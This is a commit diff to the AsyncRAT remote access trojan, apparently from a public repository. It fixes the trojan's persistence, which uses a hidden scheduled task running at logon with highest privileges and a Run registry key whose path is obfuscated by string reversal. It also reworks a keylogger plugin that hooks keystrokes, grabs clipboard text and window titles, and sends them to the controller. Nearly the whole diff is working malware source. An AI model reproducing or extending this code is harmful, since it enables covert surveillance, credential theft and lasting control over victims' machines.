update

fixed startup method
PlatformTarget from anycpu to x86

Author: Nyrotication

AsyncRAT-C#/Client/Client.csproj

@@ -47,7 +47,7 @@
     <GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
+    <PlatformTarget>x86</PlatformTarget>
     <DebugType>none</DebugType>
     <Optimize>true</Optimize>
     <OutputPath>..\Binaries\Release\Stub\</OutputPath>

AsyncRAT-C#/Client/Install/NormalStartup.cs

@@ -34,7 +34,7 @@ public static void Install()
                         Process.Start(new ProcessStartInfo
                         {
                             FileName = "cmd",
-                            Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
+                            Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + "\"" + Path.GetFileNameWithoutExtension(installPath.Name) + "\"" + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
                             WindowStyle = ProcessWindowStyle.Hidden,
                             CreateNoWindow = true,
                         });
@@ -43,7 +43,7 @@ public static void Install()
                     {
                         using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
                         {
-                            key.SetValue(Path.GetFileNameWithoutExtension(installPath.FullName), "\"" + installPath.FullName + "\"");
+                            key.SetValue(Path.GetFileNameWithoutExtension(installPath.Name), "\"" + installPath.FullName + "\"");
                         }
                     }
 

AsyncRAT-C#/Client/Settings.cs

@@ -13,7 +13,7 @@ public static class Settings
 #if DEBUG
         public static string Ports = "6606";
         public static string Hosts = "127.0.0.1";
-        public static string Version = "0.5.6E";
+        public static string Version = "0.5.7A";
         public static string Install = "false";
         public static string InstallFolder = "AppData";
         public static string InstallFile = "Test.exe";

AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs

@@ -53,7 +53,7 @@ protected override void WndProc(ref Message m)
                 MsgPack msgpack = new MsgPack();
                 msgpack.ForcePathObject("Packet").AsString = "keyLogger";
                 msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
-                msgpack.ForcePathObject("log").AsString = $"\n###  Clipboard ###\n{Clipboard.GetCurrentText()}\n";
+                msgpack.ForcePathObject("log").AsString = $"\n\r[Clipboard]\n{Clipboard.GetCurrentText()}\n\r";
                 Connection.Send(msgpack.Encode2Bytes());
             }
             base.WndProc(ref m);
@@ -184,11 +184,8 @@ private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
                         }
                         else
                         {
-                            sb.Append(Environment.NewLine);
-                            sb.Append(Environment.NewLine);
-                            sb.Append($"###  {GetActiveWindowTitle()} | {DateTime.Now.ToShortTimeString()} ###");
-                            sb.Append(Environment.NewLine);
-                            sb.Append(currentKey);
+                            sb.Append($"\n\r[{DateTime.Now.ToShortTimeString()}] [{GetActiveWindowTitle()}]");
+                            sb.Append($"\n{currentKey}");
                         }
                         MsgPack msgpack = new MsgPack();
                         msgpack.ForcePathObject("Packet").AsString = "keyLogger";
@@ -225,19 +222,20 @@ private static string GetActiveWindowTitle()
         {
             try
             {
-                IntPtr hwnd = GetForegroundWindow();
-                GetWindowThreadProcessId(hwnd, out uint pid);
-                Process p = Process.GetProcessById((int)pid);
-                string title = p.MainWindowTitle;
-                if (string.IsNullOrWhiteSpace(title))
-                    title = p.ProcessName;
-                CurrentActiveWindowTitle = title;
-                return title;
+                const int nChars = 256;
+                StringBuilder stringBuilder = new StringBuilder(nChars);
+                IntPtr handle = GetForegroundWindow();
+                GetWindowThreadProcessId(handle, out uint pid);
+                if (GetWindowText(handle, stringBuilder, nChars) > 0)
+                {
+                    CurrentActiveWindowTitle = stringBuilder.ToString();
+                    return CurrentActiveWindowTitle;
+                }
             }
             catch (Exception)
             {
-                return "???";
             }
+            return "???";
         }
 
         #region "Hooks & Native Methods"
@@ -249,6 +247,8 @@ private static string GetActiveWindowTitle()
         private static string CurrentActiveWindowTitle;
 
 
+        [DllImport("user32.dll")]
+        private static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
         private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
         [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
         private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs

@@ -23,12 +23,10 @@ public HandleUninstall()
                     {
                         Process.Start(new ProcessStartInfo()
                         {
-                            FileName = "schtasks",
-                            Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'",
+                            FileName = "cmd",
+                            Arguments = "/c schtasks /delete /f  /tn " + "\"" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + "\"",
+                            WindowStyle = ProcessWindowStyle.Hidden,
                             CreateNoWindow = true,
-                            ErrorDialog = false,
-                            UseShellExecute = false,
-                            WindowStyle = ProcessWindowStyle.Hidden
                         });
                     }
                 }

AsyncRAT-C#/Server/Properties/AssemblyInfo.cs

@@ -31,5 +31,5 @@
 // You can specify all the values or you can default the Build and Revision Numbers
 // by using the '*' as shown below:
 // [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("0.5.6.0")]
-[assembly: AssemblyFileVersion("0.5.6.0")]
+[assembly: AssemblyVersion("0.5.7.0")]
+[assembly: AssemblyFileVersion("0.5.7.0")]

AsyncRAT-C#/Server/Settings.cs

@@ -19,7 +19,7 @@ public static class Settings
 
         public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
         public static X509Certificate2 ServerCertificate;
-        public static readonly string Version = "AsyncRAT 0.5.6E";
+        public static readonly string Version = "AsyncRAT 0.5.7A";
         public static object LockListviewClients = new object();
         public static object LockListviewLogs = new object();
         public static object LockListviewThumb = new object();